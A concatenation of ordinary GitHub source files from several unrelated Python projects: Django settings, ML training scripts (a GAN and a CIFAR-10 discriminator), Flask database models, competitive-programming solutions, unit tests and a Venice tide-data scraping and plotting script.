'tornadochat.urls'\n\nWSGI_APPLICATION = 'tornadochat.wsgi.application'\n\nTEMPLATE_DIRS = (\n 
os.path.join(PROJECT_PATH, 'templates')\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n # 'django.contrib.admindocs',\n 'chat_app',\n 'south',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","repo_name":"4l1fe/chat-tornado","sub_path":"tornadochat/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42136674949","text":"import argparse\nimport contraband.param_mapping as mapping\nimport os\nfrom pprint import pformat\nfrom contraband import utils\n\n\ndef get_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-dataset')\n parser.add_argument('-exp')\n parser.add_argument('-index')\n parser.add_argument('-checkpoints',\n nargs='+')\n args = vars(parser.parse_args())\n\n exp = args['exp']\n\n dataset = args['dataset']\n datasets = ['fluo', '17_A1']\n if dataset not in datasets:\n raise ValueError(\"invalid dataset name\")\n\n index = None\n try:\n index = int(args['index'])\n except Exception as e:\n print(e)\n if index is None:\n raise ValueError(\"index is not specified or is not an int\")\n\n checkpoints = []\n if 'checkpoints' in args:\n checkpoints = args['checkpoints']\n\n return dataset, exp, index, checkpoints\n\n\ndef make_dirs(logdir, index):\n\n curr_log_dir = os.path.join(logdir, \"combination-\" + str(index))\n os.makedirs(curr_log_dir, exist_ok=True)\n assert os.path.isdir(curr_log_dir), \\\n os.path.join(\"Dir \", curr_log_dir, \"doesn't exist\")\n\n os.makedirs(curr_log_dir + '/contrastive/checkpoints', exist_ok=True)\n os.makedirs(os.path.join(curr_log_dir, 'seg'), exist_ok=True)\n\n assert os.path.isdir(curr_log_dir + '/contrastive/checkpoints'), \\\n \"Dir \" + curr_log_dir + \"doesn't exist\"\n assert os.path.isdir(curr_log_dir + '/seg'), \\\n \"Dir \" + curr_log_dir + \"doesn't exist\"\n\n return curr_log_dir\n\n\ndef get_logdir(dataset, expirement_num):\n\n expirement_dir = [\n filename\n for filename in os.listdir(os.path.join(\"expirements\", dataset))\n if filename.startswith('EXP' + str(expirement_num))\n ][0]\n\n logdir = os.path.join(\"expirements\", dataset, expirement_dir)\n\n assert os.path.isdir(\n logdir), \"Dir \" + logdir + \" doesn't exist\"\n\n return logdir, expirement_dir\n\n\ndef get_params(params):\n\n contrastive_params = mapping.generate_param_grid(params['contrastive'])\n seg_params = mapping.generate_param_grid(params['seg'])\n model_params = params['model']\n if 'save_embs' in params:\n embedding_params = params['save_embs']\n\n # Get correct combinations of parameters\n index_combs = {\n \"contrastive\": contrastive_params,\n \"model\": model_params\n }\n index_combs = mapping.generate_param_grid(index_combs)\n contrastive_params = [comb['contrastive'] for comb in index_combs]\n model_params = [comb['model'] for comb in index_combs]\n\n return contrastive_params, seg_params, model_params, embedding_params\n\n\ndef get_model(index, 
model_params, logger):\n logger.info(f\"Model params: {pformat(model_params[index])}\")\n\n mapping.map_model_params(model_params[index])\n\n model = model_params[index]['model']\n\n return model\n\n\ndef log_params(curr_log_dir, index, root_handler, params):\n \"\"\"\n Logs the parameters given.\n \"\"\"\n logger = utils.create_logger(curr_log_dir, index=index)\n logger.addHandler(root_handler)\n\n logger.info(\"Current log dir: \" + curr_log_dir)\n logger.info('Training with parameter combination ' + str(index))\n logger.info(\"With parameters: \" + pformat(params[index]))\n logger.info(\"\")\n","repo_name":"funkelab/contraband","sub_path":"contraband/script_utils.py","file_name":"script_utils.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25654571515","text":"def cmb(n, r, mod):\n if r < 0 or n < r:\n return 0\n r = min(r, n - r)\n numerator, denominator = 1, 1\n for i in range(1, r + 1):\n numerator = (numerator * (n + 1 - i)) % mod\n denominator = (denominator * i) % mod\n return numerator * pow(denominator, mod - 2, mod) % mod\n\n\ndef solve():\n W, H = map(int, input().split())\n MOD = 10 ** 9 + 7\n ans = cmb(W + H - 2, H - 1, MOD)\n print(ans)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC034/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37853681242","text":"#import keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Conv2D, Reshape, BatchNormalization\nfrom keras.layers import LeakyReLU, Dropout, Flatten, UpSampling2D, Input, ZeroPadding2D\nfrom keras import optimizers\nfrom keras.datasets import mnist\n#import numpy\nimport numpy as np\n#import matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nclass GAN():\n\tdef __init__(self):\n\t\tself.input_shape = (28, 28, 1)\n\t\tself.latent_dim = 100\n\t\t#input layer\n\t\tinput = Input(shape = (100,))\n\n\t\tself.discriminator = self.make_discriminator()\n\t\tself.discriminator.compile(loss='binary_crossentropy', optimizer= 'adam', metrics=['accuracy'])\n\n\t\tself.generator = self.make_generator()\n\t\t#img layer\n\t\timg = self.generator(input)\t\n\n\t\tself.combined = Model(input, self.discriminator(img))\n\t\tself.discriminator.trainable = False\n\t\tself.combined.compile(loss='binary_crossentropy', optimizer= 'adam')\n\n\n\tdef generate_noise(self, amount):\n\t\treturn np.random.normal(0, 1, (amount, self.latent_dim))\n\n\tdef make_generator(self):\n\t\tmodel = Sequential()\n\t\tmodel.add(Dense(128 * 7 * 7, activation=\"relu\", input_dim=self.latent_dim))\n\t\tmodel.add(Reshape((7, 7, 128)))\n\t\tmodel.add(UpSampling2D())\n\t\tmodel.add(Conv2D(128, kernel_size=3, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(Activation(\"relu\"))\n\t\tmodel.add(UpSampling2D())\n\t\tmodel.add(Conv2D(64, kernel_size=3, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(Activation(\"relu\"))\n\t\tmodel.add(Conv2D(1, kernel_size=3, padding=\"same\"))\n\t\tmodel.add(Activation(\"tanh\"))\n\t\tinput = Input(shape = (100, ))\n\t\timg = model(input)\n\t\treturn Model(input, img)\n\n\tdef make_discriminator(self):\n\t\tmodel = Sequential()\n\t\tmodel.add(Conv2D(32, kernel_size=3, strides=2, input_shape= (28, 28, 1), 
padding=\"same\"))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Conv2D(64, kernel_size=3, strides=2, padding=\"same\"))\n\t\tmodel.add(ZeroPadding2D(padding=((0,1),(0,1))))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Conv2D(128, kernel_size=3, strides=2, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Conv2D(256, kernel_size=3, strides=1, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Flatten())\n\t\tmodel.add(Dense(1, activation='sigmoid'))\n\n\t\timg = Input(shape= (28, 28, 1))\n\t\tvalidity = model(img)\n\n\t\treturn Model(img, validity)\n\n\n\tdef train(self, epoch, save_interval):\n\t\t#manipulate trainning data\n\t\t(X_train, _), (_, _) = mnist.load_data()\n\t\tX_train = X_train / 127.5 - 1\n\t\tX_train = np.expand_dims(X_train, axis=3)\n\n\t\tsize = len(X_train)\n\t\ttrue = np.ones((size, 1))\n\t\tfalse = np.zeros((size, 1))\t\t\n\t\tfor i in range(epoch):\n\t\t\tnoise = self.generate_noise(len(X_train))\n\t\t\tfalse_image = self.generator.predict(noise)\n\t\t\t''' train discriminator '''\n\t\t\tself.discriminator.fit(X_train, true, batch_size = int(size / 10), epochs = 2)\n\t\t\tself.discriminator.fit(false_image, false, batch_size = int(size / 10), epochs = 2)\n\t\t\t'''train generator '''\n\t\t\tself.combined.fit(noise, true, batch_size = int(size / 100), epochs = 1)\n\t\t\tif (i % save_interval == 0):\n\t\t\t\tself.save_progress(i)\n\n\tdef save_progress(self, epoch):\n\t\tr, c = 5, 5\n\t\tnoise = self.generate_noise(r * c)\n\t\tgen_imgs = self.generator.predict(noise)\n\t\tprint(gen_imgs[0].shape)\n\t\t# Rescale images 0 - 1\n\n\t\tgen_imgs = 0.5 * gen_imgs + 0.5\n\n\t\tfig, axs = plt.subplots(r, c)\n\t\tcnt = 0\n\t\tfor i in range(r):\n\t\t\tfor j in range(c):\n\t\t\t\taxs[i,j].imshow(gen_imgs[cnt, :,:,0], cmap='gray')\n\t\t\t\taxs[i,j].axis('off')\n\t\t\t\tcnt += 1\n\t\tfig.savefig(\"images/mnist_%d.png\" % epoch, format = 'png')\n\t\tprint(\"saved\")\n\t\tplt.close()\nif __name__ == '__main__':\n\tg = GAN()\n\tg.train(50, 10)","repo_name":"tommywei110/machine-leanring-implementation","sub_path":"GAN/gan.py","file_name":"gan.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8690078525","text":"# cook your dish here\nt=int(input())\nfor j in range(t):\n n,k=map(int,input().split())\n c=list(map(str,input().split()))\n for i in range(k):\n s=c.pop()\n if(s=='H'):\n for l in range(len(c)):\n if(c[l]=='H'):\n c[l]='T'\n else:\n c[l]='H'\n print(c.count('H'))","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"POPGATES.py","file_name":"POPGATES.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"5562090033","text":"from flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import ForeignKey\nfrom datetime import datetime\nfrom sqlalchemy.sql.schema import PrimaryKeyConstraint\ndb = SQLAlchemy()\n\n\n# Python file providing the model for our database schema\n\nclass users(db.Model):\n __tablename__ = 'users'\n __table_args__ = {'sqlite_autoincrement': True}\n\n user_id = db.Column(db.Integer, primary_key=True, nullable=False, autoincrement=True)\n 
username = db.Column(db.String(30), nullable=False)\n password = db.Column(db.String(30), nullable=False)\n\n def __init__(self, user_id, username, password):\n self.user_id = user_id\n self.username = username\n self.password = password\n\n def __repr__(self):\n return f\"\"\n\n\nclass eventTable(db.Model):\n __tablename__ = 'eventTable'\n\n event_id = db.Column(db.Integer, primary_key=True, nullable=False)\n event_desc = db.Column(db.String(30), nullable=False)\n event_type = db.Column(db.String(30), nullable=False)\n event_start = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n event_end = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n event_code = db.Column(db.String(10), nullable=False)\n event_completed = db.Column(db.Integer, nullable=False)\n\n def __init__(self, event_id, event_desc, event_type, event_start, event_end, event_code, event_completed):\n self.event_id = event_id\n self.event_desc = event_desc\n self.event_type = event_type\n self.event_start = event_start\n self.event_end = event_end\n self.event_code = event_code\n self.event_completed = event_completed\n\n def __repr__(self):\n return f\"\"\n\nclass eventAttendees(db.Model):\n __tablename__ = 'eventAttendees'\n\n user_id = db.Column(db.Integer, ForeignKey('users.user_id'), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n __table_args__ = (PrimaryKeyConstraint('user_id', 'event_id'),{},)\n\n def __init__(self, user_id, event_id):\n self.user_id = user_id\n self.event_id = event_id\n\n def __repr__(self):\n return f\"\"\n\nclass eventHosts(db.Model):\n __tablename__ = 'eventHosts'\n\n user_id = db.Column(db.Integer, ForeignKey('users.user_id'), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n __table_args__ = (PrimaryKeyConstraint('user_id', 'event_id'),{},)\n \n def __init__(self, user_id, event_id):\n self.user_id = user_id\n self.event_id = event_id\n\n def __repr__(self):\n return f\"\"\n\nclass feedbackQuestions(db.Model):\n __tablename__ = 'feedbackQuestions'\n\n feedback_question_id = db.Column(db.Integer, primary_key=True, nullable=False)\n feedback_question = db.Column(db.String(100), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n\n def __init__(self, feedback_question_id, feedback_question, event_id):\n self.feedback_question_id = feedback_question_id\n self.feedback_question = feedback_question\n self.event_id = event_id\n\n def __repr__(self):\n return f\"\" \n\nclass feedback(db.Model):\n __tablename__ = 'feedback'\n\n feedback_id = db.Column(db.Integer, primary_key=True, nullable=False)\n feedback_question_id = db.Column(db.Integer, db.ForeignKey('feedbackQuestions.feedback_question_id'), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n user_id = db.Column(db.Integer, ForeignKey('users.user_id'), nullable=False)\n message = db.Column(db.String(300), nullable=False)\n feedback_date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n mood = db.Column(db.Float, nullable=False)\n sentiment = db.Column(db.Float, nullable=False)\n isAnonymous = db.Column(db.Integer, default = 0)\n\n def __init__(self, feedback_id, feedback_question_id, event_id, user_id, message, feedback_date, mood, sentiment, isAnonymous):\n self.feedback_id = feedback_id\n self.feedback_question_id = feedback_question_id\n self.event_id = event_id\n self.user_id = 
user_id\n self.message = message\n self.feedback_date = feedback_date\n self.mood = mood\n self.sentiment = sentiment\n self.isAnonymous = isAnonymous\n\n def __repr__(self):\n return f\"\"\n","repo_name":"CS261-Group-20/cs261-cw","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22305319702","text":"import requests\n\nclass TestClass:\n def test_send_report(self):\n token = \"[paste your token here]\"\n headers = {\n \"Authorization\": \"Bearer \" + token,\n }\n\n url = \"https://api.zephyrscale.smartbear.com/v2/automations/executions/junit?projectKey=[paste your project key from jira]\"\n report = {\"file\": open(\"[paste path to your xml report]\", \"rb\")}\n\n r = requests.post(\n url,\n headers=headers,\n files=report)\n\n assert r.status_code == 200 or 201\n","repo_name":"Aszton/Zephyr-Jira-Integration","sub_path":"requests/send_report.py","file_name":"send_report.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1821499773","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom discriminator import Discriminator\nfrom data_tools import data_loader_and_transformer\n\nimport argparse\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\nparser = argparse.ArgumentParser(description=\"Train the Discriminator without the Generator\")\n\n# Hyperparameters.\nparser.add_argument(\"--lr\", default=0.0001, type=float, \n help=\"learning rate\")\nparser.add_argument(\"--epochs\", default=100, type=int, \n help=\"number of training epochs\")\nparser.add_argument(\"--batch_size\", default=128, type=int, \n help=\"batch size\")\n\n# Model options.\nparser.add_argument(\"--load_checkpoint\", default=False, type=str2bool, \n help=\"resume from checkpoint\")\n\nargs = parser.parse_args()\n\n\n# Load data.\nprint(\"==> Loading data...\")\ntrainloader, testloader = data_loader_and_transformer(args.batch_size)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Load model.\nprint(\"==> Initializing model...\")\nmodel = Discriminator()\nif args.load_checkpoint:\n print(\"==> Loading checkpoint...\")\n model = torch.load('cifar10.model')\nmodel = model.to(device)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n\n# --------------------------\n# Single train and test step\n# --------------------------\n\ndef train(epoch):\n # Set to train mode.\n model.train()\n\n # Avoid the potential overflow error from Adam.\n if epoch > 10:\n for group in optimizer.param_groups:\n for p in group['params']:\n state = optimizer.state[p]\n if ('step' in state) and (state['step'] >= 1024):\n state['step'] = 1000\n \n # Learning rate schedule.\n if epoch == 50:\n for param_group in optimizer.param_groups:\n param_group['lr'] = args.lr / 10.0\n if epoch == 75:\n for param_group in optimizer.param_groups:\n param_group['lr'] = args.lr / 100.0\n \n # To monitor the training process.\n running_loss = 0\n total_correct = 0\n total_samples = 0\n \n # Start training this epoch.\n for batch_index, (images, labels) in enumerate(trainloader):\n\n images = images.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n _, outputs = model(images)\n\n loss = criterion(outputs, labels)\n loss.backward()\n\n optimizer.step()\n\n # 
Loss.\n running_loss += loss.item()\n curt_loss = running_loss / (batch_index + 1)\n\n # Accuracy.\n _, predict_label = torch.max(outputs, 1)\n total_samples += labels.shape[0]\n total_correct += predict_label.eq(labels.long()).float().sum().item()\n accuracy = total_correct / total_samples\n\n print('Training [epoch: %d] loss: %.3f, accuracy: %.5f' %\n (epoch + 1, curt_loss, accuracy))\n \n if epoch + 1 == args.epochs // 5:\n print(\"=> Saving model checkpoint...\")\n torch.save(model,'cifar10.model')\n\ndef test(epoch):\n # Set to test mode.\n model.eval()\n\n # To monitor the testing process.\n running_loss = 0\n total_correct = 0\n total_samples = 0\n\n # Testing step.\n with torch.no_grad():\n for batch_index, (images, labels) in enumerate(testloader):\n \n images = images.to(device)\n labels = labels.to(device)\n\n _, outputs = model(images)\n loss = criterion(outputs, labels)\n \n # Loss.\n running_loss += loss.item()\n curt_loss = running_loss / (batch_index + 1)\n\n # Accuracy\n _, predict_label = torch.max(outputs, 1)\n total_samples += labels.shape[0]\n total_correct += predict_label.eq(labels.long()).float().sum().item()\n accuracy = total_correct / total_samples\n \n print('Testing [epoch: %d] loss: %.3f, accuracy: %.5f' %\n (epoch + 1, curt_loss, accuracy))\n\n\n# --------------------------\n# Start training and testing\n# --------------------------\n\nprint(\"==> Start training on device {}...\".format(device))\nprint(\"\\tHyperparameters: LR = {}, EPOCHS = {}, BATCH_SIZE = {}\"\n .format(args.lr, args.epochs, args.batch_size))\n\nfor epoch in range(args.epochs):\n train(epoch)\n test(epoch)\n\nprint(\"==> Training finished. Saving model checkpoint...\")\ntorch.save(model,'cifar10.model')","repo_name":"zero91/cs598-deep-learning-fall-2018","sub_path":"homework/hw6/train_discriminator.py","file_name":"train_discriminator.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16864396581","text":"# built-in\nfrom pathlib import Path\n\n# project\nfrom dephell.converters.wheel import WheelConverter\n\n\ndef test_load_deps(requirements_path: Path):\n loader = WheelConverter()\n path = requirements_path / 'wheel.whl'\n root = loader.load(path)\n deps = {dep.name: dep for dep in root.dependencies}\n assert set(deps) == {'attrs', 'cached-property', 'packaging', 'requests'}\n\n\ndef test_load_metadata(requirements_path: Path):\n loader = WheelConverter()\n path = requirements_path / 'wheel.whl'\n root = loader.load(path)\n\n assert root.name == 'dephell'\n assert root.version == '0.2.0'\n assert root.authors[0].name == 'orsinium'\n assert not root.license\n","repo_name":"dephell/dephell","sub_path":"tests/test_converters/test_wheel.py","file_name":"test_wheel.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"28419953316","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 30 10:25:15 2021\r\n\r\n@author: Oli\r\n\"\"\"\r\n\r\nimport pytest \r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport netCDF4 as nc\r\nimport os\r\nimport random\r\nfrom copy import deepcopy\r\n\r\nrandom.seed(1987)\r\n\r\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\r\nwd = os.getcwd().replace('\\\\', '/')\r\nexec(open(\"test_setup.py\").read())\r\n\r\nfrom Core_functionality.Trees.Transfer_tree import define_tree_links, predict_from_tree\r\nfrom 
Core_functionality.AFTs.agent_class import AFT\r\nfrom Core_functionality.AFTs.arable_afts import SOSH, Intense_arable\r\nfrom model_interface.wham import WHAM\r\n\r\n\r\n#########################################################################\r\n\r\n### Load test data\r\n\r\n#########################################################################\r\n\r\nclass multiple_agent(AFT):\r\n \r\n def setup(self):\r\n AFT.setup(self)\r\n self.afr = 'Test'\r\n self.ls = 'Test'\r\n \r\n self.sub_AFT = {'exists': True, 'kind': 'Multiple', \r\n 'afr': ['Test', 'Test'], 'ls': ['Test', 'Test']} \r\n \r\n\r\n\r\n\r\nos.chdir(str(wd + '/test_data/AFTs').replace('\\\\', '/'))\r\nDummy_frame = pd.read_csv('Dummy_pars.csv')\r\nDummy_dat = nc.Dataset('Test.nc')\r\nDummy_dat = Dummy_dat['Forest_frac'][:]\r\nDummy_dat2 = 27647 - np.arange(27648)\r\nMap_data = {'Test': Dummy_dat, 'Test2': Dummy_dat2}\r\nMap_test = np.array(pd.read_csv('Test_raster.csv'))\r\nMap_data['Area'] = np.array([1]*27648)\r\n\r\n### Mock load up\r\ndummy_pars = {'AFT_dist': {}, \r\n 'Fire_use': {}, \r\n 'Dist_pars':{'Thresholds': {}, \r\n 'Probs': {}}} \r\n\r\ndummy_pars['AFT_dist']['Test/Test'] = Dummy_frame\r\ndummy_pars['AFT_dist']['Sub_AFTs/Test_Test'] = deepcopy(Dummy_frame)\r\ndummy_pars['AFT_dist']['Sub_AFTs/Test_Test'].columns = ['Unnamed: 0', 'var', 'n', 'dev', 'yval', 'splits.cutleft',\r\n 'splits.cutright', 'yprob.FALSE', 'multiple_agent']\r\n\r\ndummy_pars['Dist_pars']['Thresholds']['Test/Test'] = [pd.DataFrame(np.random.normal(8.5, 10, 1)), \r\n pd.DataFrame(np.random.normal(240, 10, 1))]\r\n\r\ndummy_pars['Dist_pars']['Probs']['Test/Test'] = [pd.DataFrame(pd.Series([np.random.beta(1, 1) for x in range(1)]), \r\n columns = ['TRUE.']) for x in range(3)]\r\n\r\ndummy_pars['Dist_pars']['Thresholds']['Sub_AFTs/Test_Test'] = [pd.DataFrame(np.random.normal(8.5, 10, 10)), \r\n pd.DataFrame(np.random.normal(240, 10, 10))]\r\n\r\ndummy_pars['Dist_pars']['Probs']['Sub_AFTs/Test_Test'] = [pd.DataFrame(pd.Series([np.random.beta(1, 1) for x in range(10)]), \r\n columns = ['multiple_agent']) for x in range(3)]\r\n\r\n\r\n\r\n### Mock model\r\nparameters = {\r\n \r\n 'xlen': 192, \r\n 'ylen': 144,\r\n 'AFTs': [multiple_agent],\r\n 'LS' : [],\r\n 'AFT_pars': dummy_pars,\r\n 'Maps' : Map_data,\r\n 'start_run': 0,\r\n 'theta' : 0.1, \r\n 'bootstrap': True, \r\n 'Observers': {},\r\n 'reporters': [], \r\n 'n_cores' : 4\r\n \r\n }\r\n\r\n\r\n##########################################################################\r\n\r\n### tests\r\n\r\n##########################################################################\r\n\r\ndef test_AFT_boot():\r\n \r\n errors = []\r\n \r\n mod = WHAM(parameters)\r\n mod.setup()\r\n mod.agents.sub_compete()\r\n \r\n probs = mod.agents[0].AFT_frame[1]['multiple_agent'][mod.agents[0].AFT_frame[1]['var'] == ''].to_list()\r\n \r\n if not probs == [float(x.iloc[-1]) for x in mod.agents[0].boot_AFT_pars[1]['Probs']]:\r\n errors.append(\"Bootstrapped parameters not loaded properly\")\r\n \r\n ### which values do not equal the mode?\r\n gt_thresh_1 = len(pd.concat([pd.Series(np.arange(0, x)) if x >= 1 else pd.Series(0) for x in mod.agents[0].boot_AFT_pars[0]['Thresholds'][0][0]]).unique())-1\r\n \r\n if not gt_thresh_1 == len(np.where(mod.agents[0].AFT_vals[0] != stats.mode(np.array(mod.agents[0].AFT_vals[0]))[0][0])[0]):\r\n \r\n errors.append(\"Bootstrapped prediction error\")\r\n \r\n assert not errors, \"errors occured:\\n{}\".format(\"\\n\".join(errors))\r\n 
\r\n","repo_name":"OliPerkins1987/Wildfire_Human_Agency_Model","sub_path":"tests/test_aft_boot.py","file_name":"test_aft_boot.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6938269821","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport wget\nimport os\nfrom datetime import datetime\n\n\n#raccolta ed estrazione dati\nnomefile=['venezia','sannicolo','alberoni','pellestrina','chioggia']\nurls=['https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Punta_Salute.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Diga_Sud_Lido.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Diga_Nord_Malamocco.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Diga_Sud_Chioggia.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Chioggia_Citta.html']\n\ndef scarica(nomefile,urls,path_data):\n dflist=[]\n for nome, url in zip(nomefile,urls):\n try:\n os.remove(f'{path_data}{nome}.html')\n except OSError:\n pass\n wget.download(url, f'{path_data}{nome}.html')\n df=pd.read_html(f'{path_data}{nome}.html')[0]\n\n df['Data'] = df['Data'].apply(lambda x: datetime.strptime(x,\"%Y-%m-%d %H:%M:%S\")) #conversione in formato datetime\n df['Giorno'] = df['Data'].dt.date\n df['Ora'] = df['Data'].dt.strftime('%H:%M')\n df = df.rename({df.columns[1]:'Altezza s.l.m. [cm]'}, axis=1) # colonna rinominata in previsione della conversione\n df['Altezza s.l.m. [cm]'] = df['Altezza s.l.m. [cm]']*100 # conversione altezza marea da m a cm\n if (nome == 'sannicolo') | (nome=='pellestrina'):\n df = df.rename({df.columns[3]:'Velocità media vento [km/h]'}, axis=1) # colonna rinominata in previsione della conversione\n df['Velocità media vento [km/h]'] = df['Velocità media vento [km/h]']*3.6 # conversione velocità vento da m/s a km/h\n \n dflist.append(df) \n return dflist\n\n\ndata =datetime.today().strftime('%Y-%m-%d')\npath_data = f'./archivio/{data}/'\nos.makedirs(path_data, exist_ok=True)\ndf_venezia,df_sannicolo,df_alberoni,df_pellestrina,df_chioggia=scarica(nomefile,urls, path_data)\n\n\n\n#grafici\nplt.rcParams.update({'text.usetex': True, \n 'font.family': 'Helvetica', \n 'font.size': 17})\nlw = 2\n\nfig, axs=plt.subplots(nrows=2,ncols=2, sharex = True, figsize=(15,15))\nfig.suptitle(f'Marea del {data}')\n\n\ndf_venezia.plot(x='Ora', y='Altezza s.l.m. [cm]', color='black', lw=lw, label='Venezia', ax=axs[0][0], grid=True, title='Venezia centro storico').set(ylabel='Altezza marea s.l.m. [cm]')\ndf_sannicolo.plot(x='Ora', y='Altezza s.l.m. [cm]', color='dodgerblue', lw=lw, label='Punta sabbioni-Lido', ax=axs[1][0])\ndf_alberoni.plot(x='Ora', y='Altezza s.l.m. [cm]', color='green', lw=lw, label='Lido-Pellestrina', ax=axs[1][0])\ndf_pellestrina.plot(x='Ora', y='Altezza s.l.m. [cm]', color='saddlebrown', lw=lw, label='Pellestrina-Chioggia', ax=axs[1][0])\ndf_chioggia.plot(x='Ora', y='Altezza s.l.m. [cm]', color='red', lw=lw, label='Chioggia', ax=axs[1][0], grid=True, title='Bocche di porto e città di Chioggia').set(ylabel='Altezza marea s.l.m. 
[cm]')\naxs[0][0].annotate('Suolo medio', (0.01,0.48), xycoords='axes fraction')\naxs[0][0].axhline(100, color='k',linestyle='dotted')\naxs[1][0].annotate('Suolo medio', (0.01,0.48), xycoords='axes fraction')\naxs[1][0].axhline(100, color='k',linestyle='dotted')\n\ndf_sannicolo.plot(x='Ora', y='Velocità media vento [km/h]', color='dodgerblue', lw=lw, label='Punta sabbioni-Lido', ax=axs[0][1])\ndf_pellestrina.plot(x='Ora', y='Velocità media vento [km/h]', color='saddlebrown', lw=lw, label='Pellestrina-Chioggia', ax=axs[0][1], grid=True, title='Velocità media del vento').set(ylabel='Velocità [km/h]')\ndf_sannicolo.plot(x='Ora', y='Faro Diga LidoD.Vento med. 10m', color='dodgerblue', lw=lw, label='Punta sabbioni-Lido', ax=axs[1][1])\ndf_pellestrina.plot(x='Ora', y='D.S.ChioggiaD.Vento med. 10m', color='saddlebrown', lw=lw, label='Pellestrina-Chioggia', ax=axs[1][1], grid=True, title='Direzione media del vento').set(ylabel='Direzione [gradi]')\naxs[1][1].annotate('Scirocco', (0.89,0.35), xycoords='axes fraction')\naxs[1][1].annotate('Bora', (0.93,0.2), xycoords='axes fraction')\n\n\nmareamin,mareamax,step = 0,210,10\naxs[0][0].axhspan(90, 110, facecolor='yellow', alpha=0.25)\naxs[0][0].axhspan(110, 140, facecolor='orange', alpha=0.3)\naxs[0][0].axhspan(140, mareamax+step, facecolor='red', alpha=0.3)\naxs[1][0].axhspan(90, 110, facecolor='yellow', alpha=0.25)\naxs[1][0].axhspan(110, 140, facecolor='orange', alpha=0.3)\naxs[1][0].axhspan(140, 